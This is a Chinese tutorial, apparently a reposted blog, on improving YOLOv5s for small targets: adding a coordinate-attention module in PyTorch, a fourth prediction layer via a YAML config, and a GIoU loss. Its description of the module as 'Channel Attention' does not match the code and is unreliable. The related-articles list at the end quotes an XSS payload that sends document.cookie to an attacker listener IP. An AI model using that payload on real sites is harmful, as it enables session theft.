YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU

news2025/1/10 16:48:53

前言:Hello大家好,我是小哥谈。在小目标场景的检测中,存在远距离目标识别效果差的情形,本节课提出一种基于改进YOLOv5的小目标检测方法。首先,在YOLOv5s模型的Neck网络层融合坐标注意力机制,以提升模型的特征提取能力;其次,增加一个预测层来提升对小目标的检测性能;进一步地,利用K-means聚类算法得到数据集合适的anchor框;最后,改进边界框回归损失函数以提高边界框的定位精度。经过试验表明,改进后的模型可以有效检测出远距离小目标,改进了漏报误报等情况,比原始YOLOv5s模型的平均精度均值(IOU=0.5)提升明显,模型在小目标场景下具有较强的泛化能力。🌈 

     目录

🚀1.基础概念

🚀2.改进思想

🚀3.添加位置

🚀4.添加步骤

🚀5.改进方法

💥💥步骤1:common.py文件修改

💥💥步骤2:yolo.py文件修改

💥💥步骤3:创建自定义yaml文件

💥💥步骤4:修改自定义yaml文件

💥💥步骤5:验证是否加入成功

💥💥步骤6:更改损失函数

💥💥步骤7:修改默认参数

💥💥步骤8:实际训练测试

🚀1.基础概念

YOLOv5主要有n、s、m、l、x 五种不同深度和宽度的网络模型,随着网络深度和宽度增加,检测速度越来越慢,考虑在实际场景应用时需要处理海量的视频,对实时性有较高要求,本次针对YOLOv5的改进就采用YOLOv5s模型作为基础模型。

YOLOv5s网络结构如下图所示,主要由4个模块组成:输入端主干网络Neck网络预测端

  • 输入端用于输入原始图像,并利用数据增强方法对输入图像进行随机缩放、裁剪、 排布;
  • 主干网络进行特征提取,主要包括CONV、C3 和 SPPF等;
  • Neck 网络实现图像特征融合,采用FPN+PAN结构,两种结构网络的结合对不同层特征进行融合,加强了特征信息;
  • 预测端输出3个尺度的特征图,用于预测大、中、小目标

 网络结构图:

说明:本文的改进是基于YOLOv5-6.0版本,其他版本的改进可自行试验,原理步骤一致。


🚀2.改进思想

小目标场景的检测中,存在远距离目标识别效果差的情形,本节课提出一种基于改进YOLOv5的小目标检测方法。首先,在YOLOv5s模型的Neck网络层融合坐标注意力机制,以提升模型的特征提取能力;其次,增加一个预测层来提升对小目标的检测性能;进一步地,利用K-means聚类算法得到数据集合适的anchor框;最后,改进边界框回归损失函数以提高边界框的定位精度。经过试验表明,改进后的模型可以有效检测出远距离小目标,改进了漏报误报等情况,比原始YOLOv5s模型的平均精度均值(IOU=0.5)提升明显,模型在小目标场景下具有较强的泛化能力。

总结:添加注意力机制 + 添加预测层 + 改进损失函数

针对本文所提出的改进,选择CA注意力机制和GIoU损失函数。分别介绍如下:

CA注意力机制:

CA(Channel Attention)注意力机制是一种用于计算机视觉任务的注意力机制,它可以通过学习通道之间的关系来提高模型的性能。CA注意力机制的基本思想是,对于给定的输入特征图,通过学习通道之间的关系来计算每个通道的权重,然后将这些权重应用于输入特征图中的每个像素点,以产生加权特征图。

具体来说,CA注意力机制包括两个步骤通道特征提取通道注意力计算。在通道特征提取阶段,我们使用一个全局平均池化层来计算每个通道的平均值和最大值,然后将它们连接起来并通过一个全连接层来产生通道特征。在通道注意力计算阶段,我们使用一个sigmoid函数来将通道特征映射到[0,1]范围内,并将其应用于输入特征图中的每个像素点,以产生加权特征图。

加入CA注意力机制的好处包括:

 (1)增强特征表达:CA注意力机制能够自适应地选择和调整不同通道的特征权重,从而更好地表达输入数据。它可以帮助模型发现和利用输入数据中重要的通道信息,提高特征的判别能力和区分性。

 (2)减少冗余信息:通过抑制不重要的通道,CA注意力机制可以减少输入数据中的冗余信息,提高模型对关键特征的关注度。这有助于降低模型的计算复杂度,并提高模型的泛化能力。

 (3)提升模型性能:加入CA注意力机制可以显著提高模型在多通道输入数据上的性能。它能够帮助模型更好地捕捉到通道之间的相关性和依赖关系,从而提高模型对输入数据的理解能力。

所以,加入CA注意力机制可以有效地增强模型对多通道输入数据的建模能力,提高模型性能和泛化能力。它在图像处理、视频分析等任务中具有重要的应用价值。

GIoU损失函数:

GIoU(Generalized Intersection over Union)是一种目标检测中常用的损失函数,它可以用来衡量预测框真实框之间的重叠程度。相比于传统的IoU损失函数,GIoU损失函数考虑了预测框和真实框之间的距离,因此更加准确。

关于更多YOLOv5基础知识及改进方法,可参考专栏:《YOLOv5:从入门到实战》


🚀3.添加位置

YOLOv5s (6.0 版本) 模型只有3个预测层,当将尺寸为640×640的图像输入网络时,Neck网络分别进行8倍16 倍32 倍下采样,对应的预测层特征图尺寸为80×8040×4020×20,分别用来检测小目标中目标大目标。为提升远距离小目标的识别准确率,在YOLOv5s原始网络上增加一个预测层。预测层增加的位置如下所示,在Neck网络中增加1次上 采样,第3次上采样后,与主干网络第2层融合,得到新增加的160×160的预测层,用以检测小目标。整个模型改进后采用4个预测尺度的预测层,将底层特征高分辨率和深层特征高语义信息充分利用,并且未显著增加网络复杂度。

原始YOLOv5s三个检测层,聚类anchor框数量为9,加入1个预测层后,聚类得到12个anchor 框,将anchor框按照特征图检测尺度分配,如下表所示:

特征图20×20

40×40

80×80160×160
感受野较小
锚框(116,90)(156,198)(373,326)(30,61)(62,45)(59,119)(10,13)(16,30)(33,23)(5,7)(9,13)(11,15)

本节课针对预测层的添加位置如下所示:

本文针对CA注意力机制的添加位置如下所示:

所以,改进后总的网络结构图如下所示:


🚀4.添加步骤

针对本文的改进,具体步骤如下所示:👇

步骤1:common.py文件修改

步骤2:yolo.py文件修改

步骤3:创建自定义yaml文件

步骤4:修改自定义yaml文件

步骤5:验证是否加入成功

步骤6:更改损失函数

步骤7:修改默认参数

步骤8:实际训练测试


🚀5.改进方法

💥💥步骤1:common.py文件修改

common.py中添加CA注意力机制模块,所要添加模块的代码如下所示,将其复制粘贴到common.py文件末尾的位置。

CA注意力机制模块代码:

# CA
class h_sigmoid(nn.Module):
    def __init__(self, inplace=True):
        super(h_sigmoid, self).__init__()
        self.relu = nn.ReLU6(inplace=inplace)
    def forward(self, x):
        return self.relu(x + 3) / 6
class h_swish(nn.Module):
    def __init__(self, inplace=True):
        super(h_swish, self).__init__()
        self.sigmoid = h_sigmoid(inplace=inplace)
    def forward(self, x):
        return x * self.sigmoid(x)
 
class CoordAtt(nn.Module):
    def __init__(self, inp, oup, reduction=32):
        super(CoordAtt, self).__init__()
        self.pool_h = nn.AdaptiveAvgPool2d((None, 1))
        self.pool_w = nn.AdaptiveAvgPool2d((1, None))
        mip = max(8, inp // reduction)
        self.conv1 = nn.Conv2d(inp, mip, kernel_size=1, stride=1, padding=0)
        self.bn1 = nn.BatchNorm2d(mip)
        self.act = h_swish()
        self.conv_h = nn.Conv2d(mip, oup, kernel_size=1, stride=1, padding=0)
        self.conv_w = nn.Conv2d(mip, oup, kernel_size=1, stride=1, padding=0)
    def forward(self, x):
        identity = x
        n, c, h, w = x.size()
        #c*1*W
        x_h = self.pool_h(x)
        #c*H*1
        #C*1*h
        x_w = self.pool_w(x).permute(0, 1, 3, 2)
        y = torch.cat([x_h, x_w], dim=2)
        #C*1*(h+w)
        y = self.conv1(y)
        y = self.bn1(y)
        y = self.act(y)
        x_h, x_w = torch.split(y, [h, w], dim=2)
        x_w = x_w.permute(0, 1, 3, 2)
        a_h = self.conv_h(x_h).sigmoid()
        a_w = self.conv_w(x_w).sigmoid()
        out = identity * a_w * a_h
        return out

💥💥步骤2:yolo.py文件修改

首先在yolo.py文件中找到parse_model函数这一行,加入CoordAtt 。具体如下图所示:

💥💥步骤3:创建自定义yaml文件

models文件夹中复制yolov5s.yaml,粘贴并重命名为yolov5s_CA_SmallTarget.yaml。具体如下图所示:

💥💥步骤4:修改自定义yaml文件

本步骤是修改yolov5s_CA_SmallTarget.yaml,根据改进后的网络结构图进行修改。

由下面这张图可知,当添加CA注意力机制 + 增加预测层之后,后面的层数会发生相应的变化,需要修改相关参数。

备注:层数从0开始计算,比如第0层、第1层、第2层......🍉 🍓 🍑 🍈 🍌 🍐  

综上所述,修改后的完整yaml文件如下所示:

# YOLOv5 🚀 by Ultralytics, GPL-3.0 license

# Parameters
nc: 80  # number of classes
depth_multiple: 0.33  # model depth multiple
width_multiple: 0.50  # layer channel multiple
anchors:
  - [5,7, 9,13, 11,15]     #P2/4,增加的anchor
  - [10,13, 16,30, 33,23]  # P3/8
  - [30,61, 62,45, 59,119]  # P4/16
  - [116,90, 156,198, 373,326]  # P5/32

# YOLOv5 v6.0 backbone
backbone:
  # [from, number, module, args]
  [[-1, 1, Conv, [64, 6, 2, 2]],  # 0
   [-1, 1, Conv, [128, 3, 2]],    # 1
   [-1, 3, C3, [128]],            # 2
   [-1, 1, Conv, [256, 3, 2]],    # 3
   [-1, 6, C3, [256]],            # 4
   [-1, 1, Conv, [512, 3, 2]],    # 5
   [-1, 9, C3, [512]],            # 6
   [-1, 1, Conv, [1024, 3, 2]],   # 7
   [-1, 3, C3, [1024]],           # 8
   [-1, 1, SPPF, [1024, 5]],      # 9
  ]

# YOLOv5 v6.0 head
head:
  [ [ -1, 1, Conv, [ 512, 1, 1 ] ],  #10
    [ -1, 1, nn.Upsample, [ None, 2, 'nearest' ] ], #11
    [ [ -1, 6 ], 1, Concat, [ 1 ] ],   #12
    [ -1, 3, C3, [ 512, False ] ],     #13

    [ -1, 1, Conv, [ 256, 1, 1 ] ],    #14
    [ -1, 1, nn.Upsample, [ None, 2, 'nearest' ] ], #15
    [ [ -1, 4 ], 1, Concat, [ 1 ] ],    #16

    [ -1, 3, C3, [ 256, False ] ],       #17
    [ -1, 1, Conv, [ 128, 1, 1 ] ],      #18
    [ -1, 1, nn.Upsample, [ None, 2, 'nearest' ] ],   #19
    [ [ -1, 2 ], 1, Concat, [ 1 ] ],     #20
    [ -1, 3, C3, [ 128, False ] ],       #21

    [ -1, 1, Conv, [ 128, 3, 2 ] ],      #22
    [ [ -1, 18 ], 1, Concat, [ 1 ] ],    #23
    [ -1, 3, C3, [ 256, False ] ],       #24
    [ -1, 1, CoordAtt,[256]],                #25
    [ -1, 1, Conv, [ 256, 3, 2 ] ],      #26
    [ [ -1, 14 ], 1, Concat, [ 1 ] ],    #27

    [ -1, 3, C3, [ 512, False ] ],       #28
    [ -1, 1, CoordAtt,[512]],                #29
    [ -1, 1, Conv, [ 512, 3, 2 ] ],      #30
    [ [ -1, 10 ], 1, Concat, [ 1 ] ],    #31
    [ -1, 3, C3, [ 1024, False ] ],      #32
    [ -1, 1, CoordAtt,[1024]],               #33
    [ [ 21, 25, 29, 33 ], 1, Detect, [ nc, anchors ] ],  # 四个检测头,增加的为21
  ]

💥💥步骤5:验证是否加入成功

yolo.py文件里,将配置改为我们刚才自定义的yolov5s_CA_SmallTarget.yaml

修改1,位置位于yolo.py文件165行左右,具体如图所示:

修改2,位置位于yolo.py文件363行左右,具体如下图所示:

说明:♨️♨️♨️

需要根据自定义的yaml文件名进行配置。

配置完毕之后,点击“运行”,结果如下图所示:

由运行结果可知,与我们前面更改后的网络结构图相一致,证明添加成功了!✅

💥💥步骤6:更改损失函数

本文需要更改损失函数为GIoU。

通常用utils / loss.py文件下的__call__函数计算回归损失(bbox损失),具体如下图所示:

将画红框这一行改为下列代码即可:

iou = bbox_iou(pbox, tbox[i], GIoU=True).squeeze()  # iou(prediction, target)

💥💥步骤7:修改默认参数

train.py文件中找到parse_opt函数,然后将第二行 '--cfg的default改为 'models/yolov5s_CA_SmallTarget.yaml ',然后就可以开始进行训练了。🎈🎈🎈 

💥💥步骤8:实际训练测试

步骤7中,parse_opt函数中的参数'--weights'采用的是yolov5s.pt,'--data'所采用的是helmet.yaml(作者提前创建的安全帽佩戴检测地址及分类信息,同学可自定义),然后设置'--epochs'为100轮

相关参数设置完毕后,点击运行train.py文件,没有发生报错,模型正常训练,具体如下图所示:👇

结束语:同学们有任何问题,请在评论区给出,我看到了会及时回复~!🍉 🍓 🍑 🍈 🍌 🍐

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1195691.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

HTML点击链接强制触发下载

常见网页中会有很多点击链接即下载的内容&#xff0c;以下示范一下如何实现 <a href"文件地址" download"下载的文件名字&#xff08;不包括后缀&#xff09;">强制下载</a> 下面举个例子&#xff1a; <a href"./image/test.jpg"…

【我悟了】异常断电导致的文件系统变为只读——案例分析

背景 应领导要求&#xff0c;临时支持其他项目上遇到的一个问题。由于该问题属于未涉及的知识领域&#xff0c;从接触到最终给出方案&#xff0c;也花了我不少精力。在此进行分享&#xff0c;主要介绍在面对不熟悉的问题领域时&#xff0c;分析问题的思路。希望能够给年轻的同学…

小心你的大模型被基准评估坑了,模型直接傻掉!人大高瓴揭秘大模型作弊

作者 | 谢年年、Python 从 ChatGPT 横空出世到国内外「百模大战」打响以来&#xff0c;我们隔三差五就会看到某某大模型又超越多个模型&#xff0c;刷新SOTA&#xff0c;成功屠榜的消息。 这些榜单都是基于一系列高质量的评估基准创立的&#xff0c;从不同的方面比较LLMs的性能…

【VastbaseG100】 The password has been expired, please change the password.

NOTICE: The password has been expired, please change the password. vsql ((Vastbase G100 V2.2 (Build 10) Release) compiled at 2022-09-18 13:48:47 commit 9104 last mr ) 非SSL连接&#xff08;安全性要求高时&#xff0c;建议使用SSL连接&#xff09; 输入 "h…

xss 盲打

XSS 盲打 为什么教盲打&#xff0c;是因为处于被动&#xff0c;要等待受害者触发 1.利用存储型XSS 先将代码写入留言。同时kali开启端口监听&#xff08;下面IP是kali的&#xff09; <script>document.write(\<img src\"http://10.9.47.79/\document.cookie\\&qu…

Python开源项目RestoreFormer(++)——人脸重建(Face Restoration),模糊清晰、划痕修复及黑白上色的实践

有关 python anaconda 及运行环境的安装与设置请参阅&#xff1a; Python开源项目CodeFormer——人脸重建&#xff08;Face Restoration&#xff09;&#xff0c;模糊清晰、划痕修复及黑白上色的实践https://blog.csdn.net/beijinghorn/article/details/134334021 1 RESTOREF…

3.1 IDA Pro编写IDC脚本入门

IDA Pro内置的IDC脚本语言是一种灵活的、C语言风格的脚本语言&#xff0c;旨在帮助逆向工程师更轻松地进行反汇编和静态分析。IDC脚本语言支持变量、表达式、循环、分支、函数等C语言中的常见语法结构&#xff0c;并且还提供了许多特定于反汇编和静态分析的函数和操作符。由于其…

程序员的护城河:技术、创新与软实力的完美融合

作为IT行业的从业者&#xff0c;我们深知程序员在保障系统安全、数据防护以及网络稳定方面所起到的重要作用。他们是现代社会的护城河&#xff0c;用代码构筑着我们的未来。那程序员的护城河又是什么呢&#xff1f;是技术能力的深度&#xff1f;是对创新的追求&#xff1f;还是…

Linux 基于 LVM 逻辑卷的磁盘管理【简明教程】

一、传统磁盘管理的弊端 传统的磁盘管理&#xff1a;使用MBR先对硬盘分区&#xff0c;然后对分区进行文件系统的格式化最后再将该分区挂载上去。 传统的磁盘管理当分区没有空间使用进行扩展时&#xff0c;操作比较麻烦。分区使用空间已经满了&#xff0c;不再够用了&#xff…

Linux系统初步了解

Linux系统由4个主要部分组成&#xff1a;内核、Shell、文件系统和应用程序。 本专题主要是围绕这四个来展开的。 POSIX&#xff08;可移植操作系统接口&#xff09;定义了操作系统应该为应用程序提供的标准接口&#xff0c;其意愿是获得源码级别的软件可移植性。所以Linux选择…

程序员的那些坏习惯!来看看你有几个?

一、前言 写了20多年代码&#xff0c;我见过不下于4位数的程序员&#xff0c;我觉得程序员的能力水平可以分为4个阶段&#xff1a;线性级、逻辑级、架构级和工程级。 同样的在这些人当中&#xff0c;我也发现了8个程序员最常见的陋习&#xff0c;基本上可以覆盖90%的人&#…

高德资深技术专家孙蔚:海量用户应用数据库选型、升级实践

高德地图&#xff08;以下简称“高德”&#xff09;作为一款用户出行必备、拥有海量用户数据的导航软件&#xff0c;对系统运行稳定性要求极高。 一直以来&#xff0c;高德每时每刻都在生产的一些数据库中的数据已经达到数百 TB&#xff0c;数据量的增长不仅带来存储成本的迅速…

关于Office阻止访问嵌入对象的解决办法

问题 Word文档中想要下载嵌入的文件时被Office阻止了&#xff0c;无法下载。 解决办法 打开文件——选项——信任中心&#xff0c;在宏设置中启用所有宏&#xff0c;关于Macro、Acitve X插件等项目设置上&#xff0c;建议暂时全部设置为允许&#xff0c;看下相关对象的访问…

try-catch-finally执行以及他们在有return的情况下,基本数据类型、对象以及有异步赋值情况异同分析

这两天面试,遇到好几个人,都是那种我感觉我肚子里的墨水都吐出来完了,难不倒人家,于是问了下家里那位老狗,从最开始就念叨着你问他try-catch在有return的情况下怎么执行的,执行结果是啥,我前面没理,后面确实有点遭不住了,来看看吧,肚子里添点墨水,别把脸丢大了~ 做…

分布式搜索引擎ES

文章目录 初识elasticsearch了解ES倒排索引正向索引倒排索引正向和倒排 es的一些概念文档和字段索引和映射mysql与elasticsearch 安装ES部署kibana安装IK分词器扩展词词典停用词词典 索引库操作mapping映射属性索引库的CRUD创建索引库和映射查询索引库修改索引库删除索引库 文档…

MySQL 常见面试题总结:索引 InnoDB索引 MyISAM索引

1.关系型数据库&#xff08;MySQL&#xff09;和非关系型数据库(nosql)区别 存储方式&#xff1a;关系型以表的形式 非关系型以键值对形式 应用场景&#xff1a;关系型一致性要求较高&#xff0c;非关系型并发性要求较高 2. Mysql如何实现的索引机制&#xff1f; MySQL中索…

WAF入侵防御系统标准检查表

软件开发全文档获取&#xff1a;进主页

『Linux升级路』基础开发工具——vim篇

&#x1f525;博客主页&#xff1a;小王又困了 &#x1f4da;系列专栏&#xff1a;Linux &#x1f31f;人之为学&#xff0c;不日近则日退 ❤️感谢大家点赞&#x1f44d;收藏⭐评论✍️ 目录 一、vim的基本概念 &#x1f4d2;1.1命令模式 &#x1f4d2;1.2插入模式 &…

ENVI IDL:如何监测代码运行时间(计时器函数实现)?

01 预想 我预想的是在循环中加入一个函数&#xff0c;可以监测相邻两次循环的运行时间&#xff0c;正常操作如此&#xff1a; pro unknowfor ix 0, 5 do beginstart_timekeeping systime(1)wait, randomu(systime(1), 1) ; 此处systime(1)仅仅作为seed种子end_timekeeping…

C# DirectoryInfo类的用法

在C#中&#xff0c;DirectoryInfo类是System.IO命名空间中的一个类&#xff0c;用于操作文件夹&#xff08;目录&#xff09;。通过DirectoryInfo类&#xff0c;我们可以方便地创建、删除、移动和枚举文件夹。本文将详细介绍DirectoryInfo类的常用方法和属性&#xff0c;并提供…